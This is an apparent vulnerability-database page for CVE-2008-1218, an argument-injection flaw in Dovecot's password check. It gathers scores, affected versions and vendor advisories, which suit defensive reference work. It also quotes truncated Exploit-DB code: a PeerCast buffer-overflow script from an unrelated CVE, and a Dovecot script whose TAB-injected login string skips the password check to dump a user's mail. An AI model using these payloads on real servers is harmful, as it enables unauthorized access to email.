CVE-2008-1218
published 2008-03-10CVE-2008-1218: Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the…
PriorityP351medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
7.34%
93.6th percentile
Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | dovecot | < dovecot 1:1.0.13-1 (bookworm) | dovecot 1:1.0.13-1 (bookworm) |
| dovecot | dovecot | <= 1.0.12 | — |
| dovecot | dovecot | <= 1.1 | — |
| dovecot | dovecot | >= 0 < 1:1.0.13-1 | 1:1.0.13-1 |
| dovecot | dovecot | >= 0 < 1:1.0.13-1 | 1:1.0.13-1 |
| dovecot | dovecot | >= 0 < 1:1.0.13-1 | 1:1.0.13-1 |
| dovecot | dovecot | >= 0 < 1:1.0.13-1 | 1:1.0.13-1 |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv6.8MEDIUM
vendor_debian6.8MEDIUM
vendor_redhat6.8MEDIUM
vendor_ubuntu4.4MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Dovecot vulnerabilities
vendor_ubuntu·2008-03-26·CVSS 4.4
CVE-2008-1218 [MEDIUM] Dovecot vulnerabilities
Title: Dovecot vulnerabilities
Summary: Dovecot vulnerabilities
It was discovered that the default configuration of dovecot could allow
access to any email files with group "mail" without verifying that a user
had valid rights. An attacker able to create symlinks in their mail
directory could exploit this to read or delete another user's email.
(CVE-2008-1199)
By default, dovecot passed special characters to the underlying
authentication systems. While Ubuntu releases of dovecot are not known
to be vulnerable, the authentication routine was proactively improved
to avoid potential future problems. (CVE-2008-1218)
Instructions: After a standard system upgrade, additional dovecot configuration changes
are needed.
ATTENTION: Due to an unavoidable configuration update, the dovecot
settings
Red Hat
dovecot: unauthorized login
vendor_redhat·2008-03-09·CVSS 6.8
CVE-2008-1218 [MEDIUM] dovecot: unauthorized login
dovecot: unauthorized login
Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
Statement: Not vulnerable. This issue did not affect versions of Dovecot as shipped with Red Hat Enterprise Linux 4 or 5.
Debian
CVE-2008-1218: dovecot - Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x befor...
vendor_debian·2008·CVSS 6.8
CVE-2008-1218 [MEDIUM] CVE-2008-1218: dovecot - Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x befor...
Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
Scope: local
bookworm: resolved (fixed in 1:1.0.13-1)
bullseye: resolved (fixed in 1:1.0.13-1)
forky: resolved (fixed in 1:1.0.13-1)
sid: resolved (fixed in 1:1.0.13-1)
trixie: resolved (fixed in 1:1.0.13-1)
GHSA
GHSA-g2xp-pqfg-wfq9: Argument injection vulnerability in Dovecot 1
ghsa_unreviewed·2022-05-01
CVE-2008-1218 [MEDIUM] GHSA-g2xp-pqfg-wfq9: Argument injection vulnerability in Dovecot 1
Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
OSV
CVE-2008-1218: Argument injection vulnerability in Dovecot 1
osv·2008-03-10·CVSS 6.8
CVE-2008-1218 [MEDIUM] CVE-2008-1218: Argument injection vulnerability in Dovecot 1
Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
No detection rules found.
Exploit-DB
PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities
exploitdb·2008-04-29
CVE-2008-2040 PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities
PeerCast 0.1218 - 'getAuthUserPass' Multiple Buffer Overflow Vulnerabilities
---
source: https://www.securityfocus.com/bid/28986/info
PeerCast is prone to multiple buffer-overflow vulnerabilities because it fails to adequately bounds-check user-supplied input before copying it to an insufficiently sized buffer.
Successfully exploiting these issues will allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
These issues affect PeerCast 0.1218; other versions may also be affected.
#!/usr/bin/env python
import sys, socket
port = 7144
buff = 'GET /http/ HTTP/1.1\n'
buff+= 'Connection: close\n'
buff+= 'Accept: */*\n'
buff+= 'Authorization: Basic OmZ' + 'vb29'*128 + 'vbwo=' +
Exploit-DB
Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure
exploitdb·2008-03-14·CVSS 6.8
CVE-2008-1218 [MEDIUM] Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure
Dovecot IMAP 1.0.10 1.1rc3] Exploit
#Here's an exploit for the recent TAB vulnerability in Dovecot.
#It's nothing special since in the wild there are few to none
#targets because of the special option which has to be set.
#see CVE Entry CVE-2008-1218
#Exploit written by Kingcope
import sys
import imaplib
print "Dovecot IMAP [1.0.10 -> 1.1rc2] Exploit"
print "Prints out all E-Mails for any account if special configuration option is set"
print "Exploit written by kingcope\n"
if len(sys.argv) [-nossl]" % sys.argv[0]
exit(0);
if len(sys.argv)>3 and sys.argv[3] == "-nossl":
M = imaplib.IMAP4(sys.argv[1])
else:
M = imaplib.IMAP4_SSL(sys.argv[1])
M.login(sys.argv[2], "\"\tmaster_user=root\tskip_password_check=1\"");
M.select()
print "login succeeded."
typ, data = M.search(None, 'ALL')
k=0
for
http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00004.htmlhttp://secunia.com/advisories/29226http://secunia.com/advisories/29295http://secunia.com/advisories/29364http://secunia.com/advisories/29385http://secunia.com/advisories/29396http://secunia.com/advisories/29557http://secunia.com/advisories/32151http://security.gentoo.org/glsa/glsa-200803-25.xmlhttp://wiki.rpath.com/wiki/Advisories:rPSA-2008-0108http://www.debian.org/security/2008/dsa-1516http://www.dovecot.org/list/dovecot-news/2008-March/000064.htmlhttp://www.dovecot.org/list/dovecot-news/2008-March/000065.htmlhttp://www.securityfocus.com/archive/1/489481/100/0/threadedhttp://www.securityfocus.com/bid/28181https://exchange.xforce.ibmcloud.com/vulnerabilities/41085https://issues.rpath.com/browse/RPL-2341https://usn.ubuntu.com/593-1/https://www.exploit-db.com/exploits/5257https://www.redhat.com/archives/fedora-package-announce/2008-March/msg00358.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-March/msg00381.htmlhttp://lists.opensuse.org/opensuse-security-announce/2008-10/msg00004.htmlhttp://secunia.com/advisories/29226http://secunia.com/advisories/29295http://secunia.com/advisories/29364http://secunia.com/advisories/29385http://secunia.com/advisories/29396http://secunia.com/advisories/29557http://secunia.com/advisories/32151http://security.gentoo.org/glsa/glsa-200803-25.xmlhttp://wiki.rpath.com/wiki/Advisories:rPSA-2008-0108http://www.debian.org/security/2008/dsa-1516http://www.dovecot.org/list/dovecot-news/2008-March/000064.htmlhttp://www.dovecot.org/list/dovecot-news/2008-March/000065.htmlhttp://www.securityfocus.com/archive/1/489481/100/0/threadedhttp://www.securityfocus.com/bid/28181https://exchange.xforce.ibmcloud.com/vulnerabilities/41085https://issues.rpath.com/browse/RPL-2341https://usn.ubuntu.com/593-1/https://www.exploit-db.com/exploits/5257https://www.redhat.com/archives/fedora-package-announce/2008-March/msg00358.htmlhttps://www.redhat.com/archives/fedora-package-announce/2008-March/msg00381.html
2008-03-10
Published